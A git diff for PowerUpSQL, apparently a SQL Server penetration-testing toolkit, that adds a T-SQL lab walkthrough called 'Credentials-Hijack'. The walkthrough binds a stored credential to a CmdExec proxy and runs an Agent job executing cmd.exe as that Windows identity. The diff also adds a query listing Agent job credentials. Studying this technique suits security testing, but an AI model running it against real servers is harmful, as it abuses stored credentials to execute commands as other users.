diff --git a/LICENSE b/LICENSE index aa9b85b..44d5389 100644 --- a/LICENSE +++ b/LICENSE @@ -2,7 +2,7 @@ PowerUpSQL is provided under the 3-clause BSD license below. ************************************************************* -Copyright (c) 2022, NetSPI +Copyright (c) 2024, NetSPI All rights reserved. Redistribution and use in source and binary forms, with or without diff --git a/templates/tsql/Get-10MostExpressiveQueries.tsql b/templates/tsql/Get-10MostExpensiveQueries.tsql similarity index 100% rename from templates/tsql/Get-10MostExpressiveQueries.tsql rename to templates/tsql/Get-10MostExpensiveQueries.tsql diff --git a/templates/tsql/Get-AgentCredentialList.tsql b/templates/tsql/Get-AgentCredentialList.tsql new file mode 100644 index 0000000..9507d1a --- /dev/null +++ b/templates/tsql/Get-AgentCredentialList.tsql @@ -0,0 +1,15 @@ +// Get list of credentials used by agent jobs. + +USE msdb; +GO + +SELECT +j.name AS JobName, +s.step_id AS StepID, +s.step_name AS StepName, +c.name AS CredentialName +FROM sysjobs j +JOIN sysjobsteps s ON j.job_id = s.job_id +LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id +WHERE c.name IS NOT NULL +ORDER BY j.name, s.step_id; diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql new file mode 100644 index 0000000..2b1bb9d --- /dev/null +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -0,0 +1,153 @@ +-- Tested and worked - SQL Server v2014 instance +-- Author: Scott Sutherland @_nullbind (Twitter) + +-- ################################# +-- LAB SETUP SUMMARY +--- ################################# +-- 1. Install local instance +-- 2. Create local OS user named 'testuser'. +-- 3. Log into SQL Server instance as a sysadmin and create credential. + +-- ################################# +-- LAB SETUP SUMMARY +-- ################################# +-- 1. Log into the SQL Server instance as a sysadmin. +-- 2. List credentials. +-- 3. List proxy accounts. +-- 3. Create proxy account and assign privileges to it (if proxy account doesnt exist for credential already). List proxy accounts to confirm addition. +-- 4. Create Agent job that uses the proxy account. +-- 5. Execute a PowerShell, VBscript, JScript, or CMDEXEC Agent Job. These will create processes on the system in that user context. +-- 6. Confirm execution by reviewing history. + +--- ################################# +-- Walk Through Below +--- ################################# + +---------------------------------------------------- +-- Create a new credential named 'MyCredential' for testing (for lab only) +---------------------------------------------------- +CREATE CREDENTIAL [MyCredential] +WITH IDENTITY = 'yourcomputernamehere\testuser', +SECRET = 'P@ssw0rd!'; + +---------------------------------------------------- +-- Get a list of all credentials +---------------------------------------------------- +select * from sys.credentials + +---------------------------------------------------- +-- Get a list proxies +---------------------------------------------------- +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + +---------------------------------------------------- +-- Create a Proxy Using the Target Credential (if needed) +---------------------------------------------------- + +USE msdb; +GO + +EXEC sp_add_proxy + @proxy_name = N'MyCredentialProxy', -- Name of the proxy + @credential_name = N'MyCredential'; -- Name of the existing credential + +EXEC sp_grant_proxy_to_subsystem + @proxy_name = N'MyCredentialProxy', + @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem + +---------------------------------------------------- +-- Get a list proxies - again +---------------------------------------------------- +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + +---------------------------------------------------- +-- Create the SQL Server Agent Job Configured to use the Proxy Account +---------------------------------------------------- + +USE msdb; +GO + +-- Create the job +EXEC sp_add_job + @job_name = N'WhoAmIJob'; -- Name of the job + +-- Add a job step that uses the proxy to execute the whoami command +EXEC sp_add_jobstep + @job_name = N'WhoAmIJob', + @step_name = N'ExecuteWhoAmI', + @subsystem = N'CmdExec', -- Specifies an Operating System command + @command = N'c:\windows\system32\cmd.exe /c whoami > c:\temp\whoami.txt', -- The OS command to execute + @on_success_action = 1, -- 1 = Quit with success + @on_fail_action = 2, -- 2 = Quit with failure + @proxy_name = N'MyCredentialProxy'; -- The proxy created earlier + +-- Add a schedule to the job (optional, can be manual or scheduled) +EXEC sp_add_jobschedule + @job_name = N'WhoAmIJob', + @name = N'RunOnce', + @freq_type = 1, -- 1 = Once + @active_start_date = 20240820, -- Start date (YYYYMMDD) + @active_start_time = 120000; -- Start time (HHMMSS) + +-- Add the job to the SQL Server Agent +EXEC sp_add_jobserver + @job_name = N'WhoAmIJob', + @server_name = N'(LOCAL)'; -- The server where the job will run + +---------------------------------------------------- +-- Get List of Proxy Account used by Agent Jobs +-- Show job, step, proxy, cred, and identity +---------------------------------------------------- + +USE msdb; +GO + +SELECT + jobs.name AS JobName, + steps.step_id AS StepID, + steps.step_name AS StepName, + proxies.name AS ProxyName, + ISNULL(credentials.name, 'No Credential') AS CredentialName, + ISNULL(credentials.credential_identity, 'No Identity') AS IdentityName +FROM + msdb.dbo.sysjobs AS jobs +JOIN + msdb.dbo.sysjobsteps AS steps ON jobs.job_id = steps.job_id +JOIN + msdb.dbo.sysproxies AS proxies ON steps.proxy_id = proxies.proxy_id +LEFT JOIN + sys.credentials AS credentials ON proxies.credential_id = credentials.credential_id +WHERE + steps.proxy_id IS NOT NULL +ORDER BY + jobs.name, steps.step_id; + +-------------------------- +-- Execute the Job +-------------------------- +EXEC sp_start_job @job_name = N'WhoAmIJob'; + +-------------------------- +-- Check the Output/Error +-------------------------- +EXEC sp_help_jobhistory @job_name= N'WhoAmIJob'; diff --git a/templates/tsql/New-TempTableSample.sqk b/templates/tsql/New-TempTableSample.sql similarity index 100% rename from templates/tsql/New-TempTableSample.sqk rename to templates/tsql/New-TempTableSample.sql